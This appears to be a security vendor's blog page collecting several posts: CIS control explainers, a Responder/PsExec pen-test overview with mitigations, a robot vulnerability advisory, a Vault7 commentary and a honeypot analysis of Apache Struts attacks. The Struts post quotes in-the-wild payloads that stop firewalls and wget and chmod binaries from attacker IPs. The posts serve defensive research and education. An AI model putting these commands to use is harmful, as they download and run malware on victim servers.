For Linux environments, each sysadmin should have a separate account. Enforce them using the ‘su’ command to gain root. Better yet is disabling su and enforcing the use of the ‘sudo’ command.


There are also 3rd parties who sell software which can help with this, such as CyberArk Viewfinity, Avecto PrivilegeGuard, BeyondTrust Powerbroker or Thycotic Privilege Manager. Note Rapid7 does not partner with these companies, but we recommend them based on what we see other organizations deploying.


All the other things

As with most of the controls, the sub-controls also list other precautions.


  • Change all default passwords on all deployed devices
  • Use multi-factor authentication for all administrative access
  • Use long passwords (14 characters or more)
  • Require system admins to have a normal account and a privileged account, and access the privileged account through an escalation mechanism, such as sudo for Linux or RunAs for Windows.
  • Configure systems to issue alerts on unsuccessful logins to admin accounts. Rapid7 offers products such as InsightIDR which can detect and alert on these events. A use case might be if an admin leaves for vacation, you monitor their account and if you see any login attempts, it triggers an investigation.
  • As an advanced control, admin tasks can only be performed on machines which are air-gapped from the rest of the network, and only connect to systems they need to administer.


Reducing or controlling admin is not hard to implement. However, it is a change to the way things are being done, and fear of change is very powerful. Do your best to have conversations to ease the fear. You are not taking anything away. You are simply making it harder for errors to occur which have large impact, and you are reducing the risk that an attacker can easily comprise an account, a system, fileshares, sensitive data, and more.


Related Resources


CIS Critical Control 1: Inventory of Authorized and Unauthorized Devices Explained

CIS Critical Control 2: Inventory of Authorized and Unauthorized Software Explained

CIS Critical Control 3: Secure Configurations for Hardware & Software Explained

CIS Critical Control 4: Continuous Vulnerability Assessment & Remediation

By Emilie St-Pierre, TJ Byrom, and Eric Sun


Ask any pen tester what their top five penetration testing tools are for internal engagements, and you will likely get a reply containing nmap, Metasploit, CrackMapExec, SMBRelay and Responder.



An essential tool for any whitehat, Responder is a Python script that listens for Link-Local Multicast Name Resolution (LLMNR), Netbios Name Service (NBT-NS) and Multicast Domain Name System (mDNS) broadcast messages (Try saying that out loud 5 times in a row!). It is authored and maintained by Laurent Gaffie and is available via its GitHub repository, located at


Once you find yourself on an internal network, Responder will quickly and stealthily get user hashes when systems respond to the broadcast services mentioned above. Those hashes can then be cracked with your tool of choice. As Responder’s name implies, the script responds to the broadcast messages sent when a Windows client queries a hostname that isn’t located within the local network’s DNS tables. This is a common occurrence within Windows networks, and a penetration tester doesn’t need to wait too long before capturing such broadcast traffic. Behold our beautiful diagram to help visualize this concept:


Due to the client viewing any reply as legitimate, Responder is able to send its own IP as the query answer, no questions asked. Once received, the client then sends its authentication details to the malicious IP, resulting in captured hashes. And believe us, it works - we’ve seen penetration testers get hashes in a matter of seconds using this tool, which is why it is used early within an internal engagement’s timeline.


If no hashes are captured via the first method, Responder can be also be used to man-in-the-middle Internet Explorer Web-Proxy Autodiscovery Protocol (WPAD) traffic. In a similar manner to the previous attack, Responder replies with its own IP address for clients querying the network for the “wpad.dat” Proxy Auto-Config (PAC) file. If successful, Responder once again grabs the hashes which can then be cracked, or if time is of the essence, used to pass-the-hash with PsExec (PsExec examples) as we will demonstrate below.

Once hashes have been captured, it’s time to get cracking! Responder saves all hashes as John Jumbo compliant outputs and a SQLite database. A reliable cracking tool such as John the Ripper can be used to complete this step. Even if cracking is unsuccessful, hashes can be used to validate access to other areas of the target network. This is the beauty of using Responder in conjunction with PsExec.


PsExec is a Windows-based administrative tool which can be leveraged to move laterally around the target network. It is useful to launch executables, command prompts and processes on systems. There are numerous tools available for penetration testers who wish to take advantage of PsExec’s availability within a network. For example, Metasploit has over 7 PsExec-related modules, its most popular ones being psexec and psexec_psh. There’s also the previously-mentioned Windows executable and Core Security’s impacket psexec python script. All are potential options depending on the penetration tester’s preferences and tool availability.




Many networks today struggle to reliably detect remote code execution, which is why it’s very common for penetration testers to use Responder and PsExec in the early stages of an engagement. This is due to default Windows environment configurations, as well as protocol-specific behavior which by default trusts all responses. 


Fortunately, such attacks can be prevented and detected. To mitigate the first attack we mentioned using Responder’s broadcast attacks, these can be prevented by disabling LLMNR and NBT-NS. Since networks already use DNS, these protocols aren’t required unless you’re running certain instances of Windows 2000 or earlier (in which case, we recommend a New Year’s resolution of upgrading your systems!).


To prevent the second showcased Responder attack caused by WPAD traffic, it is simply a matter of adding a DNS entry for ‘WPAD’ pointing to the corporate proxy server. You can also disable the Autodetect Proxy Settings on your IE clients to prevent this attack from happening.

If your company uses Rapid7’s InsightIDR, you can detect use of either Responder or PSExec. Our development team works closely with our pen-test and incident response teams to continuously add detections across the Attack Chain. For that reason, the Insight Endpoint Agent in real-time collects the data required to detect remote code execution and other stealthy attack vectors. For a 3-minute overview on InsightIDR, our incident detection and response solution that combines User Behavior Analytics, SIEM, and EDR, check out the below video.


Rapid7 InsightIDR 3-Min Overview - YouTube


References: fied s-mitigation-33283

Welcome to the fourth blog post on the CIS Critical Security Controls! This week, I will be walking you through the fourth Critical Control: Continuous Vulnerability Assessment & Remediation. Specifically, we will be looking at why vulnerability management and remediation is important for your overall security maturity, what the control consists of, and how to implement it.


Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity and requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This can lead to them taking advantage of gaps between the appearance of new knowledge and remediation activities.


By not proactively scanning for vulnerabilities and addressing discovered flaws, the likelihood of an organization's computer systems becoming compromised is high. Kind of like building and implementing an ornate gate with no fence. Identifying and remediating vulnerabilities on a regular basis is also essential to a strong overall information security program.


What it is:

The Continuous Vulnerability Assessment and Remediation control is part of the “systems” group of the 20 critical controls. This control consists of eight (8) difference sections with 4.1 and 4.3 giving guidelines around performing vulnerability scans, 4.2 and 4.6 talk about the importance of monitoring and correlating logs, 4.4 addresses staying on top of new and emerging vulnerabilities and exposures, 4.5 and 4.7 pertains to remediation, and 4.8 talks about establishing a process to assign risk ratings to vulnerabilities.


How to implement it

To best understand how to integrate each section of this control into your security program, we’re going to break them up into the logical groupings I described in the previous section (scanning, logs, new threats and exposures, risk rating, and remediation).


A large part of vulnerability assessment and remediation has to do with scanning, as proven by the fact that two sections directly pertain to scanning and two others indirectly reference it by discussing monitoring scanning logs and correlating logs to ongoing scans. The frequency of scanning will largely depend on how mature your organization is from a security standpoint and how easily it can adopt a comprehensive vulnerability management program. Section 4.1 specifically states that vulnerability scanning should occur weekly, but we know that that is not always possible due to various circumstances. This may mean monthly for organizations without a well-defined vulnerability management process or weekly for those that are better established. Either way, when performing these scans it is important to have both an internal and external scan perspective. This means that scans on machines that are internally-facing only should have authenticated scans performed on them and outward-facing devices should have both authenticated and unauthenticated scans performed.


Another point to remember about performing authenticated scans is that the administrative account being used for scans should not be tied to any particular user. Since these credentials will have administrative access to all devices being scanned, we want to decrease the risk of them getting compromised. This is also why it is important to ensure all of your scanning activities are being logged, monitored, and stored.


Depending on the type of scan you are running, your vulnerability scanner should be generating at least some attack detection events. It is important that your security team is able to (1) see that these events are being generated and (2) can match them to scan logs in order to determine whether the exploit was used against a target known to be vulnerable instead of being part of an actual attack. Additionally, scan logs and alerts should be generated and stored to track when and where the administrative credentials were being used. This way, we can determine that the credentials are only being used during scans on devices for which the use of those credentials has been approved.


So now that we have discussed scanning and logs, we are going to address how you can keep up with all of the vulnerabilities being released. There are several sites and feeds that you can subscribe to in order to stay on top of new and emerging vulnerabilities and exposures. Some of our favorite places are:


It isn’t enough to just be alerted to new vulnerabilities, however, we need to take the knowledge we have about our environment into consideration and then determine how these vulnerabilities will impact it. This is where risk rating comes into play. Section 4.8 states that we must have a process to risk-rate a vulnerability based on exploitability and potential impact and then use that as guidance for prioritization of remediation. What it doesn’t spell out for us is what this process looks like. Typically, when we work with an organization, we recommend that for each asset they take three factors into consideration:

  1. Threat Level – How would you classify the importance of the asset in terms of the data it hosts as well as its exposure level? For example, a web server may pose a higher level of threat than a device that isn’t accessible via the Internet.
  2. Risk of Compromise – What is the likelihood that the vulnerability will compromise this system? Something to keep in mind is how easy is it to exploit this vulnerability, does it require user interaction, etc.
  3. Impact of Compromise –What is the impact to the confidentiality, integrity, and availability of the system and data it hosts should a particular vulnerability gets exploited?


After our scans are complete and we are staring at the long list of vulnerabilities found on our systems, we need to determine the order in which we will do remediation.


In order to ensure patches are being applied across all systems within the organization, it is recommended to deploy and use an automated patch management tool as well as a software update tool. As you look to increase the overall security maturity of your organization, you will see that these tools are necessary if you want to have a standardized and centrally managed patching process. In more mature organizations, part of the remediation process will include pushing patches, updates, and other fixes to a single host initially. When the patching efforts are complete on this one device, the security team then performs a scan of that device in order to ensure the vulnerability was remediated prior to pushing the fix across the entire organization via the aforementioned tools. Tools are not enough to ensure that patches were fully and correctly applied, however. Vulnerability management is an iterative process, which means that vulnerability scans that occurs after remediation should be analyzed to ensure that vulnerabilities that were supposed to be remediated are no longer showing upon the report.


Vulnerability management software helps you identify the holes that can be used during an attack and how to seal them before a breach happens. But it’s more than launching scans and finding vulnerabilities; it requires you to create processes around efficient remediation and to ensure that the most critical items are being fixed first. What you do with the data you uncover is more important than simply finding vulnerabilities, which is why we recommend integrating the processes around each section of Critical Control 4.


Related Resources


This post describes three vulnerabilities in the Double Robotics Telepresence Robot ecosystem related to improper authentication, session fixation, and weak Bluetooth pairing. We would like to thank Double Robotics for their prompt acknowledgement of the vulnerabilities, and in addressing the ones that they considered serious. Two of the three vulnerabilities were patched via updates to Double Robotics servers on Mon, Jan 16, 2017.



These issues were discovered by Rapid7 researcher Deral Heiland. They were reported to Double Robotics and CERT/CC in accordance with Rapid7's disclosure policy.


Product Affected

The Double Telepresence Robot is a mobile conferencing device. Its mobility allows the remote user to roam around an office for meetings and face-to-face conversations.


Vendor Statement

From Double Robotics' co-founder and CEO, David Cann:

At Double Robotics, we seek to provide the best experience possible for our customers, which means not only providing an agile, innovative technology, but also, the highest level of safety and security. Rapid7's thorough penetration tests ensure all of our products run as securely as possible, so we can continue delivering the best experience in telepresence. Before the patches were implemented, no calls were compromised and no sensitive customer data was exposed. In addition, Double uses end-to-end encryption with WebRTC for low latency, secure video calls.


Summary of Vulnerabilities

  • R7-2017-01.1: Unauthenticated access to data
    • An unauthenticated user could gain access to Double 2 device information including: device serial numbers, current and historical driver and robot session information, device installation_keys, and GPS coordinates.
  • R7-2017-01.2: Static user session management
    • The access token (also referred to as the driver_token) which is created during account assignment to a Robot was never changed or expired. If this token was compromised, it could be used to take control of a robot without a user account or password.
  • R7-2017-01.3: Weak Bluetooth pairing
    • The pairing process between the mobile application (iPad) and robot drive unit does not require the user to know the challenge PIN. Once paired with the robot drive unit, a malicious actor can download the Double Robot mobile application from the Internet and use it (along with the web services) to take control of the drive unit.


Vulnerability Details and Mitigations

R7-2017-01.1: Unauthenticated access to data

In the following example, critical information related to a session was accessed using the URL “ n” By incrementing the "offset=" number, information for all historical and current sessions could be enumerated:




In the next example, robot and user installation keys were enumerated by incrementing the "offset=" number in the URL t=json as shown below:




On Mon, Jan 16, 2017, Double deployed a server patch to mitigate this issue.

R7-2017-01.2: Static user session management

Although the driver_token is a complex, unique, 40-character token (and so unlikely to be guessed), it can still be enumerated by anyone who has access to the Double Robot iPad or is successful in creating an SSL man-in-the-middle attack against the device. For example, via a successful man-in-the middle attack or access to the robot iPad's cache.db file, a malicious actor could identify the robot_key as shown below:






Using this robot_key, an unauthenticated user could enumerate all of the user access tokens (driver_tokens) which allow remote control access of the robot. An example of this enumeration method is shown below:




On Mon, Jan 16, 2017, Double Robotics deployed a server patch to mitigate this issue. The API queries described above no longer expose related session tokens to the Double device.


R7-2017-01.3: Weak Bluetooth pairing

The exposure of this vulnerability is limited since the unit can only be paired with one control application at a time. In addition, the malicious actor must be close enough to establish a Bluetooth connection. This distance can be significant (up to 1 mile) with the addition of a high-gain antenna.


On Mon, Jan 16, 2017, Double Robotics indicated it did not see this as a significant security vulnerability, and that it does not currently plan to patch. Users should ensure that the driver assembly remains paired to the control iPad to avoid exposure.


Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Dec 2016: Discovered by Rapid7's Deral Heiland
  • Mon, Jan 09, 2017: Disclosed to Double Robotics
  • Mon, Jan 09, 2017: Double Robotics acknowledged the vulnerabilities
  • Mon, Jan 16, 2017: R7-2017-01.1 and R7-2017-01.2 were fixed by Double Robotics via server patches
  • Tue, Jan 24, 2017: Disclosed to CERT/CC
  • Wed, Jan 25, 2017: Rapid7 and CERT/CC decided to not issue CVEs for these vulnerabilities. R7-2017-01.01 and 01.02 were present in Double's web application server. As there was only one instance of the affected software, and no user action was required to apply the fixes, no CVE is warranted. R7-2017-01.03 is a exposure for users to be aware of, but it only allows control of the drive unit if pairing is successful. User data cannot be modified without additional compromise.
  • Sun, Mar 12, 2017: Disclosed to the public

Stop number 3 on our tour of the CIS Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls) deals with Secure Configurations for Hardware & Software. This is great timing with the announcement of the death of SHA1. (Pro tip: don’t use SHA1). The Critical Controls are numbered in a specific way, following a logical path of building foundations while you gradually improve your security posture and reduce your exposure. Control 1: Inventory of Authorized and Unauthorized Devices, and Control 2: Inventory of Authorized and Unauthorized Software are foundational to understanding what you have. Now it’s time to shrink that attack surface by securing the inventory in your network.


As stated in the control description, default configurations for operating systems and applications are normally geared toward ease-of-deployment and not toward security. This means open and running ports and services, default accounts or passwords, older and more vulnerable protocols (I’m looking at YOU telnet), pre-installed and perhaps unnecessary software, and the list goes on. All of these are exploitable in their default state.


The big question is, what constitutes secure configurations? As with most questions in information security, the answer is all contextual, based on your business rules. So before you attempt a secure configuration, you need to have some understanding of what your business needs to do and what it does today.  This also means a lot of detailed analysis of your applications, and this can be a complex task. This is also a task that is a continuous process; it is not just “one and done.” Secure configuration must be continually managed to avoid security decay. As you implement vulnerability management, your systems and applications will be patched and updated, and this will change your position on secure configurations. Configurations will change based on new software or operational support changes, and if not secured attackers will take advantage of the opportunities to exploit both network-accessible services and client software.


What It Is

Secure Configurations for Hardware & Software is part of the “systems” group of the CIS critical security controls. This means that this is in the back office, by IT and security, and should not be handled by users in the front office. It’s very likely that your organization is using some kind of secure configs unless you run 100% out-of-the-box. Rapid7 finds that most orgs do not go far enough, and a lot of exposure exists that has no defined business purpose or need.


This control is broken down into seven sub-controls. The sub-controls describe the entire process of managing secure configurations, but do not go into specifics about the configurations themselves. So we will cite resources here you can use to help you start to securely configure your enterprise (and even your home systems).


How to Implement It


There are many ways to go about secure configurations, and it’s likely that not everything publicly available is going to be completely relevant. Like you would with a deny all rule in a firewall deployment, approach these with a mindset of starting as small as you can and gradually opening up your systems and applications until they are usable. This is great for new systems or those yet to be deployed. But what about older systems? It’s not very likely you can just shut them down and work this process. Still, you should seek to reduce the running services and ports, especially those which are known to be vulnerable and not in use.


The Configs

There are a number of usable resources for secure configurations. Rapid7 regularly recommends to clients the following:


  • NIST 800-70 rev 3
    • This NIST special publication is a document that governs the use of checklists, it is not itself a configuration guide. It is most valuable in breaking down configuration levels for using multiple checklists. This is especially useful in complex business environments, when you will need to have many different configuration baselines for your systems. It also contains information on developing, evaluating and testing your checklists.
  • National Vulnerability Database (NVD)
    • The NVD maintained by NIST is a great repository for many things in control 4 (Vulnerability Management), and it is also useful for control 3 with their checklists. This repo contains SCAP content, Group Policy Objects for Active Directory, and human readable settings. This is a great first start for any secure configuration activity.
  • CIS Benchmarks
    • Sometimes these are referred to hardening guides, their official name is the CIS Benchmarks. Curated by the same organization that handles the Critical Controls, the CIS Benchmarks are available for multiple operating systems, web browsers, mobile devices, virtualization platforms and more. You can also get SCAP-compliant checklists in XCCDF format for direct application to systems.
  • Security Technical Implementation Guide (STIG)
    • The STIGs are curated by the federal government, adhering to rules and guidelines issued by the Department of Defense. These pages contain actual configuration templates (some in SCAP format) that can be directly applied to systems. There are also templates for cloud-based services, application security and a lot of training references. STIGs are great, but not for the faint of heart, or for organizations who don’t have a deep technical understanding of the application or OS they’re attempting to reconfigure. So handle them with caution, but they are very helpful in locking down systems.


Minimum Standards

All of the above resources are based on consensus and community or government standards and are considered to be sound strategies to reduce your attack surface. They are not comprehensive, and as already stated your mileage may vary and you should take a customized approach that best supports your business needs.


At the end of the day, what you are looking to do is maintain a set of minimum standards for your configs. You can pore through the checklists to give you ideas, like disable IPv6 if it is not necessary, don’t use RDP without TLS, don’t ever run Telnet ever for any reason ever. Did I mention not to run telnet? Build your checklist and use it for all your deployments, and don’t forget about your existing and vulnerable systems! They need extra love too.


Rapid7 observes many organizations that know they have a vulnerable legacy system that they cannot modify directly to reduce the attack surface. If you have one of these brittle/fragile/unfixable systems, consider ways to limit inbound/outbound access and connectivity to help mitigate the risk until it can be upgraded or replaced with something more securable.


All The Other Things

Everything above talks about the first sub-control, which is the secure config itself. There are several more things this control covers, such as:

  • Follow strict configuration management processes for all changes to your secure builds.
  • Create master images (gold images) that are secure, and store those in a safe and secure location so they medieval-1125807_1280.jpgcan’t be altered.
  • Perform remote administration only over secure channels, and use a separate administration network if possible.
  • Use file integrity checking tools or application whitelisting tools to ensure your images are not being altered without authorization.
  • Verify your testable configurations and automate this as much as possible – run your vulnerability scanner against your gold image on a regular frequency and use SCAP to streamline reporting and integration.
  • Deploy configuration management tools (SCCM, Puppet/Chef, Casper) to enforce your secure configurations once they are deployed.


As you can see there’s quite a bit to getting your systems and applications secured, as well as having processes to support the ongoing care and feeding of your secure configs. This is a foundational control, so it’s important to get right and keep going with continual improvement. Putting the required time and effort into this will yield you a lot of return, simply because your exposure will have shrunk significantly, and allow you to focus on the more advanced security measures without worrying about some Powershell script kiddie popping your box because of insecure telnet. Oh, by the way, you should probably disable telnet.


For more posts examining the CIS Critical Security Controls, search for the tag "CIS 20."

UPDATE - March 10th, 2017: Rapid7 added a check that works in conjunction with Nexpose’s web spider functionality. This check will be performed against any URIs discovered with the suffix “.action” (the default configuration for Apache Struts apps). To learn more about using this check, read this post.


UPDATE - March 9th, 2017:  Scan your network for this vulnerability with check id apache-struts-cve-2017-5638, which was added to Nexpose in content update 437200607.


Attacks spotted in the wild

Yesterday, Cisco Talos published a blog post indicating that they had observed in-the-wild attacks against a recently announced vulnerability in Apache Struts. The vulnerability, CVE-2017-5638, permits unauthenticated Remote Code Execution (RCE) via a specially crafted Content-Type value in an HTTP request. An attacker can create an invalid value for Content-Type which will cause vulnerable software to throw an exception.  When the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed.


World Wide Window into the Web

For some time now Rapid7 has been running a research effort called Heisenberg Cloud. The project consists of honeypots spread across every region of five major cloud providers, as well as a handful of collectors in private networks. We use these honeypots to provide visibility into the activities of attackers so that we can better protect our customers as well as provide meaningful information to the public in general. Today, Heisenberg Cloud helped provide information about the scope and scale of the attacks on the Apache vulnerability. If in the coming days and weeks it will provide information about the evolution and lifecycle of the attacks.


A few words of caution before I continue: please keep in mind that the accuracy of IP physical location here is at the mercy of geolocation databases and it's difficult to tell who the current 0wner(s) of a host are at any given time. Also, we host our honeypots in cloud providers in order to provide broad samples. We are unlikely to see targeted or other scope-limited attacks.


Spreading malware

We use Logentries to query our Heisenberg data and extract meaningful information.  One of the aspects of the attacks is how the malicious traffic has changed over the recent days.  The graph below shows a 72 hour window in time.



The first malicious requests we saw were a pair on Tuesday, March 7th at 15:36 UTC that originated from a host in Zhengzhou, China. Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:


cd /dev/shm;
wget http://XXX.XXX.XXX.92:92/lmydess;
chmod 777 lmydess;


I've broken the command into lines to make it easier to read. It's pretty standard for a command injection or remote code execution attack against web servers. Basically, move to some place writeable, download code, make sure its executable, and run it.


After this, the malicious traffic seemed to stop until Wednesday, March 8th at 09:02 UTC when a host in Shanghai, China started sending attacks. The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:


/etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;
wget -c http://XXX.XXX.XXX.26:9/7;
chmod 777 7;


This is similar to the prior commands but this attacker tries to stop the firewall first. The requested binary was not hosted on the same IP address that attacked the honeypot. In this case the server hosting the binary was still alive and we were able to capture a sample.  It appears to be a variant of the XOR DDoS family.


Not so innocent

Much like Talos, in addition to the attempts to spread malware, we see some exploitation of the vulnerability to run "harmless" commands such as whois, ifconfig, and a couple variations that echoed a value. The word harmless is in quotes because though the commands weren't destructive they could have allowed the originator of the request to determine if the target was vulnerable. They may be part of a research effort to understand the number of vulnerable hosts on the public Internet or an information gathering effort as part of preparation for a later attack. Irrespective of the reason, network and system owners should review their environments.


A little sunshine

Based on the traffic we are seeing at this time it would appear that the bulk of the non-targeted malicious traffic appears to be limited attacks from a couple of sources. This could change significantly tomorrow if attackers determine that there is value in exploiting this vulnerability. If you are using Apache Struts this would be a great time to review Apache's documentation on the vulnerability and then survey your environment for vulnerable hosts. Remember that Apache products are often bundled with other software so you may have vulnerable hosts of which you are unaware. Expect Nexpose and Metasploit coverage to be available soon to help with detection and validation efforts. If you do have vulnerable implementations of the software in your environment, I would strongly recommend upgrading as soon as safely possible. If you cannot upgrade immediately, you may wish to investigate other mitigation efforts such as changing firewall rules or network equipment ACLs to reduce risk. As always, it's best to avoid exposing services to public networks if at all possible.


Good luck!

What follows are some first impressions on the contents of the WikiLeaks Vault7 dump. I won't be addressing the legal or ethical concerns about posting classified data that can endanger the missions and goals of American intelligence organizations. I also won't be talking about whether or not the CIA should be involved in developing cyber capabilities in the first place as we have previously written about our views on this topic. But, I will talk about the technical content of the documents posted today, which all appear to come from a shared, cross-team internal Confluence wiki used by several CIA branches, groups, and teams.


After spending the last few hours poring over the newly released material from WikiLeaks, Vault7, I'm left with the impression that the activities at the CIA with regards to developing cyber capabilities are... pretty normal.


The material is primarily focused on the capabilities of "implants" -- applications that are installed on systems after they've been compromised -- and how they're used to exfiltrate data and maintain persistence after an initial compromise of a variety of devices from Samsung smart TVs to Apple iPhones to SOHO routers, and everything in between.


The material also covers the command and control infrastructure that the CIA maintains to remotely use these implants; primarily, the details are concerned with building and testing the various components that makes up this network.


Finally, there are the projects that are focused on exploits. The exploits described are either developed in-house, or acquired from external partners. Most of the internally developed exploits are designed to escalate privileges once access is secured, while most of the remote capabilities were acquired from other intelligence organizations and contractors. The CIA does appear to prefer to develop and use exploits that have a local, physical access component.


While there is still a lot left to look at in detail, the overwhelming impression that I get from reading the material is that working on offensive tech at the CIA is pretty similar to working on any software project at any tech company. More to the point, the CIA activities detailed here are eerily similar to working on Metasploit at Rapid7. Take, for example, this post about the Meterpreter Mettle project from 2015 (which was written about the same time as these documents). Tell me that Mettle doesn't read like any one of the technical overviews in Vault7.

As we spend more time digging through the Vault7 material, and if more material is released over time, I expect we'll be less and less surprised. So far, these documents show that the CIA branches and subgroups named in the documents are behaving pretty much exactly as one might expect of any software development shop. Yes, they happen to be developing exploit code. But, as we all know, that particular capability, in and of itself, isn't novel, illegal, or evil. Rapid7, along with many other security research organizations, both public and private, do it every day for normal and legitimate security purposes.


Until I see something that's strikingly unusual, I'm having a hard time staying worked up over Vault7.

guessing-on-a-matching-test-600.gifIf you walked the RSA Conference floor(s) in San Francisco this year, you probably needed to sit down a few times in passing the 680 vendors - not because of the distance or construction as much as from the sensory overload and Rubik’s cube challenge of matching vendors with the problems they address.


Since Anton Chuvakin already stole my thunder by declaring there was no theme with such effective snark it made me jealous, I want to talk about the attention-grabbing claims intended to make solutions stand out in the Times Square-like atmosphere, but instead led to difficulty for any new attendees wanting to make sense of it all.


“Buy this technology! It is a silver bullet.”

I was mistakenly convinced that we, as a security industry, had finally moved away from the notion that one solution could solve every security problem. Blame it on fresh-faced marketing teams or true startup believers who’ve poured their heart into a solution and cannot stand the thought of missing payroll. Whatever the cause, the 42,000 attendees were assaulted with promises such as “…prevents all device compromise, stops all ongoing attacks…” and “stop all attacks – remove AV”. Layered defense doesn’t sound sexy and it is often ridiculed as “expense-in-depth”, but it is still unfortunately a reality that no single security vendor can meet all of your needs across the triad of people, process, and technology.


drone-swarm.jpgThe other half of the “so this technology is all I’ll ever need?” inference is your sudden explosion of options if you want our future machine overlords to defeat the inferior human attackers. Yes, I’m talking about “artificial intelligence” - but it didn’t stop there - one vendor had both AI and “swarm intelligence”. This is where marketing has started to go too far – at best, these solutions have some supervised machine learning algorithms and a data science team regularly using feedback to tune them [which is awesome, but not AI]; at worst, these solutions have unsupervised machine learning spewing out pointless anomalies in datasets unrelated to any realistic attacker behavior. While I loved the drone swarm responsible for the Super Bowl light show, humans were controlling those. If a single endpoint agent can discover a new malicious behavior and immediately communicate it back to the rest of the Borg-like swarm without any human assistance, they had better not quietly announce it for the first time at a conference hall.


“You want hunting, so we built automated, self-healing hunting agents!”

I noticed more vendors offering hunting services, even once as “hunting human attackers” [which caught my eye because of its clarity], and I’m not surprised given the significant barrier to small teams acquiring this advanced skill for detecting unknown threats. However, it’s already been fused with the legitimate demand for more automation in the incident response workflow to bring us a bevy of “automated hunting” and “automating the hunt” technologies, which would be oxymorons if they weren’t just pure contradictions of terms. “Automated hunting” sounds like the built-in indicators inherent to every detection solution I’ve seen, while “automating the hunt” can only be done by an advanced analyst who is scheduling hunts to occur and provide deltas for follow-up analysis, not by a piece of software looking for known indicators and unusual events. Sure, technology simplifies this process by revealing rare and unusual behavior, but detecting known IOCs is not hunting.



In a similar vein, I read about “self-healing endpoints” throughout downtown San Francisco and it brought up a lot more questions than answers. Are the deployed agents healing themselves when disabled? Will it heal my Windows 10 laptop after finding malware on it? Does it automatically restore any encrypted data from a ransomware attack? Can it administer virtual aspirin if it gets an artificial intelligence headache? Obviously, I could have visited a booth and asked these questions, but something tells me the answers would disappoint me.


“Re-imagined! ∞.0! Next-next-gen!”

After the Next-gen Firewall revolution, it seems like everybody is touting SIEM 2.0 and Next-gen AV, and it’s understandable when the available technologies for software development and data processing make leaps forward to enable a redesign of decade-old architectures, but the pace has now quickened. I ran across “deception 2.0” just two years after I first saw TrapX at RSA Conference and only a few months after I heard “deception technology” coined as a term for the niche. At this pace, we’ll be talking about Next-gen Deception and Swarm Intelligence 2.0 by Black Hat. As a general rule, if visitors to your booth have to ask “what is technology ‘x’?”, it’s too soon to start defining your company’s approach to it as 2.0.


As another reimagining of security, I’m enough of a geek to think virtual reality in a SOC sounds cool, but after seeing what it’s like to “bring VR to IR”, I felt like it’s adding to the skills an analyst needs to develop in addition to the list so long that specialization is key. Then, I remembered how often I see analysts resort to command line interfaces and the novelty wore off.


There are a lot of innovative approaches to the information security problems we face and I even saw some on display at RSA Conference. I just wish it weren’t such an exhausting fight through the noise to find them.

Filter Blog

By date: By tag: